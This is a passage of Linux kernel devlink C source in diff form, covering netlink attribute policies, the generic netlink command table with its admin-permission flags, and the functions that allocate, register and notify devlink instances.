++	[DEVLINK_ATTR_SB_TC_INDEX] = { .type = NLA_U16 },
++	[DEVLINK_ATTR_ESWITCH_MODE] = NLA_POLICY_RANGE(NLA_U16, DEVLINK_ESWITCH_MODE_LEGACY,
++						       DEVLINK_ESWITCH_MODE_SWITCHDEV),
++	[DEVLINK_ATTR_ESWITCH_INLINE_MODE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_ESWITCH_ENCAP_MODE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_DPIPE_TABLE_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_RESOURCE_ID] = { .type = NLA_U64},
++	[DEVLINK_ATTR_RESOURCE_SIZE] = { .type = NLA_U64},
++	[DEVLINK_ATTR_PARAM_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_PARAM_TYPE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_PARAM_VALUE_CMODE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_REGION_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_REGION_SNAPSHOT_ID] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_REGION_CHUNK_ADDR] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_REGION_CHUNK_LEN] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_HEALTH_REPORTER_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_FLASH_UPDATE_COMPONENT] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_FLASH_UPDATE_OVERWRITE_MASK] =
++		NLA_POLICY_BITFIELD32(DEVLINK_SUPPORTED_FLASH_OVERWRITE_SECTIONS),
++	[DEVLINK_ATTR_TRAP_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_TRAP_ACTION] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_TRAP_GROUP_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_NETNS_PID] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_NETNS_FD] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_NETNS_ID] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_TRAP_POLICER_ID] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_TRAP_POLICER_RATE] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_TRAP_POLICER_BURST] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_PORT_FUNCTION] = { .type = NLA_NESTED },
++	[DEVLINK_ATTR_RELOAD_ACTION] = NLA_POLICY_RANGE(NLA_U8, DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
++							DEVLINK_RELOAD_ACTION_MAX),
++	[DEVLINK_ATTR_RELOAD_LIMITS] = NLA_POLICY_BITFIELD32(DEVLINK_RELOAD_LIMITS_VALID_MASK),
++	[DEVLINK_ATTR_PORT_FLAVOUR] = { .type = NLA_U16 },
++	[DEVLINK_ATTR_PORT_PCI_PF_NUMBER] = { .type = NLA_U16 },
++	[DEVLINK_ATTR_PORT_PCI_SF_NUMBER] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_RATE_TYPE] = { .type = NLA_U16 },
++	[DEVLINK_ATTR_RATE_TX_SHARE] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_RATE_TX_MAX] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_RATE_NODE_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_LINECARD_INDEX] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_LINECARD_TYPE] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_SELFTESTS] = { .type = NLA_NESTED },
++};
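++
++/* Note on the policy table above: the .strict_start_type entry makes
++ * attributes from DEVLINK_ATTR_TRAP_POLICER_ID onward subject to
++ * strict validation, while older attributes keep lenient parsing for
++ * backward compatibility with existing userspace.
++ */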
++
++static const struct genl_small_ops devlink_nl_ops[] = {
++	{
++		.cmd = DEVLINK_CMD_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_get_doit,
++		.dumpit = devlink_nl_cmd_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_get_doit,
++		.dumpit = devlink_nl_cmd_port_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_RATE_GET,
++		.doit = devlink_nl_cmd_rate_get_doit,
++		.dumpit = devlink_nl_cmd_rate_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_RATE_SET,
++		.doit = devlink_nl_cmd_rate_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE,
++	},
++	{
++		.cmd = DEVLINK_CMD_RATE_NEW,
++		.doit = devlink_nl_cmd_rate_new_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_RATE_DEL,
++		.doit = devlink_nl_cmd_rate_del_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE_NODE,
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_SPLIT,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_split_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_UNSPLIT,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_unsplit_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_NEW,
++		.doit = devlink_nl_cmd_port_new_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_DEL,
++		.doit = devlink_nl_cmd_port_del_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_LINECARD_GET,
++		.doit = devlink_nl_cmd_linecard_get_doit,
++		.dumpit = devlink_nl_cmd_linecard_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_LINECARD,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_LINECARD_SET,
++		.doit = devlink_nl_cmd_linecard_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_LINECARD,
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_get_doit,
++		.dumpit = devlink_nl_cmd_sb_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_POOL_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_pool_get_doit,
++		.dumpit = devlink_nl_cmd_sb_pool_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_POOL_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_pool_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_PORT_POOL_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_port_pool_get_doit,
++		.dumpit = devlink_nl_cmd_sb_port_pool_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_PORT_POOL_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_port_pool_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_TC_POOL_BIND_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_tc_pool_bind_get_doit,
++		.dumpit = devlink_nl_cmd_sb_tc_pool_bind_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_TC_POOL_BIND_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_tc_pool_bind_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_OCC_SNAPSHOT,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_occ_snapshot_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_OCC_MAX_CLEAR,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_occ_max_clear_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_ESWITCH_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_eswitch_get_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_ESWITCH_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_eswitch_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_DPIPE_TABLE_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_dpipe_table_get,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_DPIPE_ENTRIES_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_dpipe_entries_get,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_DPIPE_HEADERS_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_dpipe_headers_get,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_DPIPE_TABLE_COUNTERS_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_dpipe_table_counters_set,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_RESOURCE_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_resource_set,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_RESOURCE_DUMP,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_resource_dump,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_RELOAD,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_reload,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_PARAM_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_param_get_doit,
++		.dumpit = devlink_nl_cmd_param_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_PARAM_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_param_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_PARAM_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_param_get_doit,
++		.dumpit = devlink_nl_cmd_port_param_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_PARAM_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_param_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_REGION_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_region_get_doit,
++		.dumpit = devlink_nl_cmd_region_get_dumpit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_REGION_NEW,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_region_new,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_REGION_DEL,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_region_del,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_REGION_READ,
++		.validate = GENL_DONT_VALIDATE_STRICT |
++			    GENL_DONT_VALIDATE_DUMP_STRICT,
++		.dumpit = devlink_nl_cmd_region_read_dumpit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_INFO_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_info_get_doit,
++		.dumpit = devlink_nl_cmd_info_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_get_doit,
++		.dumpit = devlink_nl_cmd_health_reporter_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_RECOVER,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_recover_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DIAGNOSE,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_diagnose_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DUMP_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT |
++			    GENL_DONT_VALIDATE_DUMP_STRICT,
++		.dumpit = devlink_nl_cmd_health_reporter_dump_get_dumpit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DUMP_CLEAR,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_dump_clear_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_TEST,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_test_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_FLASH_UPDATE,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_flash_update,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_GET,
++		.doit = devlink_nl_cmd_trap_get_doit,
++		.dumpit = devlink_nl_cmd_trap_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_SET,
++		.doit = devlink_nl_cmd_trap_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_GROUP_GET,
++		.doit = devlink_nl_cmd_trap_group_get_doit,
++		.dumpit = devlink_nl_cmd_trap_group_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_GROUP_SET,
++		.doit = devlink_nl_cmd_trap_group_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_POLICER_GET,
++		.doit = devlink_nl_cmd_trap_policer_get_doit,
++		.dumpit = devlink_nl_cmd_trap_policer_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_POLICER_SET,
++		.doit = devlink_nl_cmd_trap_policer_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_SELFTESTS_GET,
++		.doit = devlink_nl_cmd_selftests_get_doit,
++		.dumpit = devlink_nl_cmd_selftests_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_SELFTESTS_RUN,
++		.doit = devlink_nl_cmd_selftests_run,
++		.flags = GENL_ADMIN_PERM,
++	},
++};
++
++static struct genl_family devlink_nl_family __ro_after_init = {
++	.name		= DEVLINK_GENL_NAME,
++	.version	= DEVLINK_GENL_VERSION,
++	.maxattr	= DEVLINK_ATTR_MAX,
++	.policy = devlink_nl_policy,
++	.netnsok	= true,
++	.parallel_ops	= true,
++	.pre_doit	= devlink_nl_pre_doit,
++	.post_doit	= devlink_nl_post_doit,
++	.module		= THIS_MODULE,
++	.small_ops	= devlink_nl_ops,
++	.n_small_ops	= ARRAY_SIZE(devlink_nl_ops),
++	.resv_start_op	= DEVLINK_CMD_SELFTESTS_RUN + 1,
++	.mcgrps		= devlink_nl_mcgrps,
++	.n_mcgrps	= ARRAY_SIZE(devlink_nl_mcgrps),
++};
++
++static bool devlink_reload_actions_valid(const struct devlink_ops *ops)
++{
++	const struct devlink_reload_combination *comb;
++	int i;
++
++	if (!devlink_reload_supported(ops)) {
++		if (WARN_ON(ops->reload_actions))
++			return false;
++		return true;
++	}
++
++	if (WARN_ON(!ops->reload_actions ||
++		    ops->reload_actions & BIT(DEVLINK_RELOAD_ACTION_UNSPEC) ||
++		    ops->reload_actions >= BIT(__DEVLINK_RELOAD_ACTION_MAX)))
++		return false;
++
++	if (WARN_ON(ops->reload_limits & BIT(DEVLINK_RELOAD_LIMIT_UNSPEC) ||
++		    ops->reload_limits >= BIT(__DEVLINK_RELOAD_LIMIT_MAX)))
++		return false;
++
++	for (i = 0; i < ARRAY_SIZE(devlink_reload_invalid_combinations); i++)  {
++		comb = &devlink_reload_invalid_combinations[i];
++		if (ops->reload_actions == BIT(comb->action) &&
++		    ops->reload_limits == BIT(comb->limit))
++			return false;
++	}
++	return true;
++}
++
++/**
++ *	devlink_set_features - Set devlink supported features
++ *
++ *	@devlink: devlink
++ *	@features: devlink supported features
++ *
++ *	This interface allows us to set reload ops separately from
++ *	devlink_alloc().
++ */
++void devlink_set_features(struct devlink *devlink, u64 features)
++{
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	WARN_ON(features & DEVLINK_F_RELOAD &&
++		!devlink_reload_supported(devlink->ops));
++	devlink->features = features;
++}
++EXPORT_SYMBOL_GPL(devlink_set_features);
++
++/**
++ *	devlink_alloc_ns - Allocate new devlink instance resources
++ *	in specific namespace
++ *
++ *	@ops: ops
++ *	@priv_size: size of user private data
++ *	@net: net namespace
++ *	@dev: parent device
++ *
++ *	Allocate new devlink instance resources, including devlink index
++ *	and name.
++ */
++struct devlink *devlink_alloc_ns(const struct devlink_ops *ops,
++				 size_t priv_size, struct net *net,
++				 struct device *dev)
++{
++	struct devlink *devlink;
++	static u32 last_id;
++	int ret;
++
++	WARN_ON(!ops || !dev);
++	if (!devlink_reload_actions_valid(ops))
++		return NULL;
++
++	devlink = kzalloc(sizeof(*devlink) + priv_size, GFP_KERNEL);
++	if (!devlink)
++		return NULL;
++
++	ret = xa_alloc_cyclic(&devlinks, &devlink->index, devlink, xa_limit_31b,
++			      &last_id, GFP_KERNEL);
++	if (ret < 0) {
++		kfree(devlink);
++		return NULL;
++	}
++
++	devlink->dev = dev;
++	devlink->ops = ops;
++	xa_init_flags(&devlink->snapshot_ids, XA_FLAGS_ALLOC);
++	write_pnet(&devlink->_net, net);
++	INIT_LIST_HEAD(&devlink->port_list);
++	INIT_LIST_HEAD(&devlink->rate_list);
++	INIT_LIST_HEAD(&devlink->linecard_list);
++	INIT_LIST_HEAD(&devlink->sb_list);
++	INIT_LIST_HEAD_RCU(&devlink->dpipe_table_list);
++	INIT_LIST_HEAD(&devlink->resource_list);
++	INIT_LIST_HEAD(&devlink->param_list);
++	INIT_LIST_HEAD(&devlink->region_list);
++	INIT_LIST_HEAD(&devlink->reporter_list);
++	INIT_LIST_HEAD(&devlink->trap_list);
++	INIT_LIST_HEAD(&devlink->trap_group_list);
++	INIT_LIST_HEAD(&devlink->trap_policer_list);
++	lockdep_register_key(&devlink->lock_key);
++	mutex_init(&devlink->lock);
++	lockdep_set_class(&devlink->lock, &devlink->lock_key);
++	mutex_init(&devlink->reporters_lock);
++	mutex_init(&devlink->linecards_lock);
++	refcount_set(&devlink->refcount, 1);
++	init_completion(&devlink->comp);
++
++	return devlink;
++}
++EXPORT_SYMBOL_GPL(devlink_alloc_ns);
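++
++/* A minimal usage sketch of the allocation API above, assuming a
++ * hypothetical driver with private data 'struct my_priv' and ops
++ * 'my_devlink_ops'; error handling is trimmed:
++ *
++ *	devlink = devlink_alloc_ns(&my_devlink_ops, sizeof(struct my_priv),
++ *				   &init_net, dev);
++ *	if (!devlink)
++ *		return -ENOMEM;
++ *	priv = devlink_priv(devlink);
++ *	... the rest of the probe, which may still fail ...
++ *	devlink_register(devlink);	<- last step of a successful probe
++ *
++ * devlink_priv() returns the priv_size bytes allocated behind struct
++ * devlink.  Teardown mirrors this order: devlink_unregister() first,
++ * devlink_free() last, as the ASSERT_DEVLINK_* checks below enforce.
++ */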
++
++static void
++devlink_trap_policer_notify(struct devlink *devlink,
++			    const struct devlink_trap_policer_item *policer_item,
++			    enum devlink_command cmd);
++static void
++devlink_trap_group_notify(struct devlink *devlink,
++			  const struct devlink_trap_group_item *group_item,
++			  enum devlink_command cmd);
++static void devlink_trap_notify(struct devlink *devlink,
++				const struct devlink_trap_item *trap_item,
++				enum devlink_command cmd);
++
++static void devlink_notify_register(struct devlink *devlink)
++{
++	struct devlink_trap_policer_item *policer_item;
++	struct devlink_trap_group_item *group_item;
++	struct devlink_param_item *param_item;
++	struct devlink_trap_item *trap_item;
++	struct devlink_port *devlink_port;
++	struct devlink_linecard *linecard;
++	struct devlink_rate *rate_node;
++	struct devlink_region *region;
++
++	devlink_notify(devlink, DEVLINK_CMD_NEW);
++	list_for_each_entry(linecard, &devlink->linecard_list, list)
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++
++	list_for_each_entry(devlink_port, &devlink->port_list, list)
++		devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
++
++	list_for_each_entry(policer_item, &devlink->trap_policer_list, list)
++		devlink_trap_policer_notify(devlink, policer_item,
++					    DEVLINK_CMD_TRAP_POLICER_NEW);
++
++	list_for_each_entry(group_item, &devlink->trap_group_list, list)
++		devlink_trap_group_notify(devlink, group_item,
++					  DEVLINK_CMD_TRAP_GROUP_NEW);
++
++	list_for_each_entry(trap_item, &devlink->trap_list, list)
++		devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_NEW);
++
++	list_for_each_entry(rate_node, &devlink->rate_list, list)
++		devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_NEW);
++
++	list_for_each_entry(region, &devlink->region_list, list)
++		devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
++
++	list_for_each_entry(param_item, &devlink->param_list, list)
++		devlink_param_notify(devlink, 0, param_item,
++				     DEVLINK_CMD_PARAM_NEW);
++}
++
++static void devlink_notify_unregister(struct devlink *devlink)
++{
++	struct devlink_trap_policer_item *policer_item;
++	struct devlink_trap_group_item *group_item;
++	struct devlink_param_item *param_item;
++	struct devlink_trap_item *trap_item;
++	struct devlink_port *devlink_port;
++	struct devlink_linecard *linecard;
++	struct devlink_rate *rate_node;
++	struct devlink_region *region;
++
++	list_for_each_entry_reverse(param_item, &devlink->param_list, list)
++		devlink_param_notify(devlink, 0, param_item,
++				     DEVLINK_CMD_PARAM_DEL);
++
++	list_for_each_entry_reverse(region, &devlink->region_list, list)
++		devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_DEL);
++
++	list_for_each_entry_reverse(rate_node, &devlink->rate_list, list)
++		devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_DEL);
++
++	list_for_each_entry_reverse(trap_item, &devlink->trap_list, list)
++		devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_DEL);
++
++	list_for_each_entry_reverse(group_item, &devlink->trap_group_list, list)
++		devlink_trap_group_notify(devlink, group_item,
++					  DEVLINK_CMD_TRAP_GROUP_DEL);
++	list_for_each_entry_reverse(policer_item, &devlink->trap_policer_list,
++				    list)
++		devlink_trap_policer_notify(devlink, policer_item,
++					    DEVLINK_CMD_TRAP_POLICER_DEL);
++
++	list_for_each_entry_reverse(devlink_port, &devlink->port_list, list)
++		devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_DEL);
++	list_for_each_entry_reverse(linecard, &devlink->linecard_list, list)
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_DEL);
++	devlink_notify(devlink, DEVLINK_CMD_DEL);
++}
++
++/**
++ *	devlink_register - Register devlink instance
++ *
++ *	@devlink: devlink
++ */
++void devlink_register(struct devlink *devlink)
++{
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++	/* Make sure that we are in .probe() routine */
++
++	xa_set_mark(&devlinks, devlink->index, DEVLINK_REGISTERED);
++	devlink_notify_register(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_register);
++
++/**
++ *	devlink_unregister - Unregister devlink instance
++ *
++ *	@devlink: devlink
++ */
++void devlink_unregister(struct devlink *devlink)
++{
++	ASSERT_DEVLINK_REGISTERED(devlink);
++	/* Make sure that we are in .remove() routine */
++
